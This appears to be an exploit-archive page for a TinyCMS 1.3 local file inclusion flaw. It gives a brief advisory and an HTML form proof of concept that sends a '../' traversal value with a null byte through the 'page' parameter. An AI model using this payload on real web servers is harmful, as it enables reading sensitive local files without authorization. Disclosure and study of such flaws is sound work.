[] NeoSense
E X P L O I T S
title author type platform port cve id

TinyCMS 1.3 - 'index.php?page' Traversal Local File Inclusion

Author: KedAns-Dz
type: webapps
platform: php
port: 
date_added: 2012-06-03 
date_updated: 2015-06-23 
verified: 1 
codes: OSVDB-82648 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/53761/info

TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

TinyCMS 1.3 is vulnerable; other versions may also be affected.


<form action='http://www.example.com/index.php?page=../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.